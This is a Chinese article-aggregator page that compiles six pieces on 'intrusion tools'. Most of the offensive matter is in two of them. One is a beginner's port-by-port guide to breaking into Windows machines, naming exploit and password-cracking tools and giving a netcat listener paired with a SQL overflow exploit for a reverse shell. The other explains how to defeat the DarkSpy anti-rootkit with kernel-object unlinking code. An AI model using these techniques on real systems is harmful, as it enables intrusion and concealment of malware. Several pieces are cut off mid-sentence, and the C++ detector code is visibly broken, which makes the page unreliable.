当前位置：首页 > 实用文档 > 其他范文> 常用工具（入侵工具）

常用工具（入侵工具）

时间：2023-10-01 08:13:53 其他范文收藏本文下载本文

常用工具（入侵工具）（通用6篇）由网友“james2837”投稿提供，以下是小编为大家准备的常用工具（入侵工具），仅供参考，欢迎大家阅读。

常用工具（入侵工具）

篇1：常用工具（入侵工具）

以下工具在黑白网络（）都可以下载到，请自己搜索，

常用工具集锦（入侵工具大全）

，

webadv针对iis+sp3的溢出成功率很高(溢出后system权限!)* ipscan大范围网段快速ipc$猜解 svc远程安装/删除win2k服务 3389.vbs远程安装win2k终端服务不需i386 arpsnifferarp环境s

篇2：如何入侵网络及其使用工具

我下面给一些菜鸟讲解一下如何入侵现在的网络，主要针对win操作系统，

如何入侵网络及其使用工具

，

继微软打了sp3的补丁以后，可以说挡住了很多利用以前旧漏洞入侵他人计算机的菜鸟，像什么输入法漏洞，针对iis的idq,ida溢出漏洞等，这些可能大家太熟悉不过了。可是现在很难找到这样

篇3：高手工具七款经典入侵检测工具推荐

入侵检测（Intrusion Detection），是对入侵行为的检测，它通过收集和分析网络行为、安全日志、审计数据、其它网络上可以获得的信息以及计算机系统中若干关键点的信息，检查网络或系统中是否存在违反安全策略的行为和被攻击的迹象。

入侵检测被认为是防火墙之后的第二道安全闸门。下面，IDC评述网根据资料整理，向大家推荐七款顶级的入侵检测工具。

1 Snort

Snort是一款轻量级的网络入侵检测系统，能够在IP网络上进行实时的流量分析和数据包记录。它不仅能进行协议分析、内容检索、内容匹配，而且能用于侦测诸如缓冲溢出、隐秘端口扫描、CGI攻击、SMB探测、操作系统指纹识别等大量的攻击或非法探测。Snort使用灵活的规则去描述哪些流量应该被收集或被忽略，并且提供一个模块化的探测引擎。

2 OSSEC HIDS

这一个基于主机的开源入侵检测系统，它可以执行日志分析、完整性检查、Windows注册表监视、rootkit检测、实时警告以及动态的适时响应。除了其IDS的功能之外，它通常还可以被用作一个SEM/SIM解决方案。因为其强大的日志分析引擎，互联网供应商、大学和数据中心都乐意运行OSSEC HIDS，以监视和分析其防火墙、IDS、Web服务器和身份验证日志。

3 Fragroute/Fragrouter

是一个能够逃避网络入侵检测的工具箱，这是一个自分段的路由程序，它能够截获、修改并重写发往一台特定主机的通信，可以实施多种攻击，如插入、逃避、拒绝服务攻击等。它拥有一套简单的规则集，可以对发往某一台特定主机的数据包延迟发送，或复制、丢弃、分段、重叠、打印、记录、源路由跟踪等，

严格来讲，这个工具是用于协助测试网络入侵检测系统的，也可以协助测试防火墙，基本的TCP/IP堆栈行为。

4 BASE

BASE又称基本的分析和安全引擎，BASE是一个基于PHP的分析引擎，它可以搜索、处理由各种各样的IDS、防火墙、网络监视工具所生成的安全事件数据。其特性包括一个查询生成器并查找接口，这种接口能够发现不同匹配模式的警告，还包括一个数据包查看器/解码器，基于时间、签名、协议、IP地址的统计图表等。

5 Sguil

是一款被称为网络安全专家监视网络活动的控制台工具，它可以用于网络安全分析。其主要部件是一个直观的GUI界面，可以从Snort/barnyard提供实时的事件活动。还可借助于其它的部件，实现网络安全监视活动和IDS警告的事件驱动分析。

6 Namp

nmap被开发用于允许系统管理员察看一个大的网络系统有哪些主机以及其上运行何种服务。它支持多种协议的扫描如UDP，TCP connect，TCP SYN （half open）， ftp proxy （bounce attack），Reverse-ident， ICMP （ping sweep）， FIN， ACK sweep，Xmas Tree， SYN sweep，和Null扫描。

7 Tripwire

Tripwire是一款入侵检测和数据完整性产品，它允许用户构建一个表现最优设置的基本服务器状态。它并不能阻止损害事件的发生，但它能够将目前的状态与理想的状态相比较，以决定是否发生了任何意外的或故意的改变。如果检测到了任何变化，就会被降到运行障碍最少的状态

篇4：的几种入侵方法及工具防范

实用的几种入侵方法及工具防范!

1. 1433端口入侵

scanport.exe 查有1433的机器

SQLScanPass.exe 进行字典暴破（字典是关键）

最后 SQLTools.exe入侵

对sql的sp2及以下的系统，可用sql的hello 溢出漏洞入侵。

nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口

（以上反向的，测试成功）

sqlhelloz.exe 入侵ip 1433 （这个是正向连接）

2. 4899端口入侵

用4899过滤器.exe，扫描空口令的机器。

3. 3899的入侵

对很早的机器，可以试试3389的溢出(win3389ex.exe)

对的机器，可以试试字典暴破。(tscrack.exe)

4. 80入侵

对sp3以前的机器，可以用webdav入侵；

对bbs论坛，可以试试上传漏洞（upfile.exe或dvup_delphi.exe）

可以利用SQL进行注入，

（小榕的注入软件）。

5. serv-u入侵(21端口）

对5. 004及以下系统，可用溢出入侵。（serv5004.exe）

对5.1.0.0及以下系统，可用本地提升权限。（servlocal.exe）

对serv-u的MD5加密密码，可以用字典暴破。（crack.vbs）

输入一个被serv-u加密的密码（34位长），通过与字典档（dict.txt）的比较，得到密码。如：cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A

6. 554端口

用real554.exe入侵。

7. 6129端口

用DameWare6129.exe入侵。

8. 系统漏洞

利用135、445端口，用ms03026、ms03039、ms03049、ms04011漏洞

进行溢出入侵。

9. 3127等端口

可以利用doom病毒开的端口，用nodoom.exe入侵。（可用mydoomscan.exe查）。

10. 其他入侵

利用shanlu的入侵软件入侵（WINNTAutoAttack.exe）。

篇5：编写arp入侵工具并附代码

工具原理：

需要将网关ip地址写入gateway.ini，第一次运行的时候自动生成mac.ini文件，保存网关原始的mac地址，每两秒钟自动获取一次网关ip跟原始的mac做对比，不对则提示，

对于c++操作ini文件的还是没搞定，用了两个配置文件。

主要代码如下：

//////////////////////////////

#include

#include “iostream”

#include “fstream”

#include “string”

#include “windows.h”

#include “Iphlpapi.h”

#pragma comment(lib , “IpHlpApi.lib”)

#pragma comment(lib , “ws2_32.lib”)

#define MACFILE “mac.ini” //mac配置文件

#define GATEWAY “gateway.ini”//网关地址文件

using namespace std;

int main(int argc,char * argv[])

{

string ipadd;

string macadd;

char bc;

//读取网关ip地址

fstream _ipadd;

_ipadd.open(GATEWAY,ios::in);

while(_ipadd.get(bc))

{

ipadd+=bc;

}

cout << “ARP欺骗检查工具 By：Neeao \n”;

cout << “网关IP:” << ipadd << endl;

int iReturn;

DWORD dwIP;

BYTE byMAC[6];

DWORD dwLen;

WSADATA WsaData;

WSAStartup(MAKEWORD(2, 0), &WsaData);

dwIP = inet_addr(ipadd.c_str);

//cout << dwIP <<“\n”;

if (dwIP == INADDR_NONE)

{

cout << “IP地址出错: ” << ipadd;

return 1;

}

//循环获取mac地址

while(TRUE)

{

// 发送ARP查询包获得 MAC 地址

dwLen = 6;

iReturn = SendARP(dwIP, 0, (PULONG) &byMAC, &dwLen);

if (iReturn != NO_ERROR)

{

printf(“出错了:只能获取当前网关下主机的MAC地址.\n”, argv[1]);

//__leave;

return 1;

}

char MACadd[50];

sprintf(MACadd,“%.2X-%.2X-%.2X-%.2X-%.2X-%.2X”,byMAC[0],byMAC[1],byMAC[2],byMAC[3],byMAC[4],byMAC[5]);

//cout << MACadd;

//判断macadd是否为空，不为空直接跳过

if(macadd==“”)

{

fstream _mac;

_mac.open(MACFILE,ios::in);

if(!_mac)

{

//cout<<<“没有被创建”;

//第一次运行写入mac地址，为初始mac地址，

fstream _macr;

_macr.open(MACFILE,ios::out|ios::app);

if(!_macr)

{

cout<<“文件创建失败,磁盘不可写或者文件为只读!”;

exit(1);

}

_macr << MACadd;

_macr.close();

macadd = MACadd;

}

else

{

char ch;

string content;

while(_mac.get(ch))

{

content+=ch;

}

_mac.close();

macadd = content;

cout<< “MAC地址为：” <<< endl;

}

//判断mac地址

if(macadd==MACadd)

{

cout << “ok\n”;

//return 1;

}else

{

cout << “MAC地址被修改了\n”;

//return 1;

}

Sleep(2000);//每2秒钟获取一次

}

return 0;

}

篇6：教你如何对抗反入侵工具武林安全网

DarkSpy是由CardMagic和wowocock编写的anti-rootkit反入侵不错的工具，

教你如何对抗反入侵工具武林安全网

。因为正在写的本科毕设与检测rootkit有关，所以这几天分析一下，看有什么可利用的。分析进行得比较顺利，因为DarkSpy里面所采用的技术多数Internet上已经见过，不过肯定有一些创意的哦。

先说说里面的新东西：驱动开发网站的一位会员启发我们DarkSpy修改了

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager中的

GlobalFlag为0x4000，这是做什么呢？原来这会使得NtGlobalFlag加入Maintain

Object Typelist标志，于是系统创建对象时会把它加入Type链表中，这样可以遍历链表来查找对象。修改标志需要重启机器，这应该就是“强模式”要重启的理由。正如那位会员所说，作者故意隐瞒了这点，我也觉得不妥：如果是为了防止别人crack，也应该提供卸载程序的，因为这个标志一直不被清除，不再使用DarkSpy的用户依然会为此付出代价：每个内核对象都要额外分配16字节的核心空间，那成千上万的对象呢?

这个技巧对DKOM来说比较weak了，用下面的代码清除：

VOID

ClearObjectCreatorInfo(

PVOID Object

)

{

POBJECT_HEADER bjectHeader = OBJECT_TO_OBJECT_HEADER(Object);

POBJECT_HEADER_CREATOR_INFO CreatorInfo =

OBJECT_HEADER_TO_CREATOR_INFO(ObjectHeader);

if (CreatorInfo != NULL)

{

RemoveEntryList(&CreatorInfo->TypeList);

InitializeListHead(&CreatorInfo->TypeList);

}

传入处理的对象就脱链了，

这几行代码可让“强模式”失效。

下面简单说说击破的法门：

一、驱动：

DarkSpy1.0.3版及以前很简单，学习Futo rootkit断开PsLoadedModuleList，再将驱动对象传入上面的ClearObjectCreatorInfo，不论“强模式”还是“弱模式”均搞定。DarkSpy1.0.4版有了修改，不过依旧是查找DriverObject，在适当的时候清理掉就可以了，比如可以walkkernel object tree，还有更简单的办法:)

二、进程：

DarkSpy的进程功能把好多东西堆到一起来恶心rootkit的作者们，怎么样，被恶心到了吧？虽

然里面的技术可能不新鲜，但是这么一组合，难以全部清除的。下面把隐藏需要做的事列举列举：

1、PspCidTable就学futo抹掉；

2、进程、线程对象传入ClearObjectCreatorInfo；

3、它还使用csrss里的进程句柄，直接到csrss进程里ZwClose掉最简单；

4、DarkSpy在我的机器崩溃过，分析dump，原来与杀软冲突：它也hook了SwapContext，不好办？

恢复不就行了。恢复时机很重要，相信你也能想到不错的。说说我的思路：在任一条call SwapContext之前的路径上下hook，hook的程序什么也不做，专门检查SwapContext，被改则改回去，这是很通用的做法，它要是hook别的地方也一样搞定。

5、还有一个由线程到进程的，自己去发掘吧，也该动动手么...嘿嘿。

最后可以完全隐藏自己的进程，不过你累不累，什么东西非有进程才能做，没进程就不能做？都核心驱动了...感觉真没必要。

三、文件：

据说是Create IRP，嘿嘿，不过我还没学文件系统驱动，那位大虾补充吧。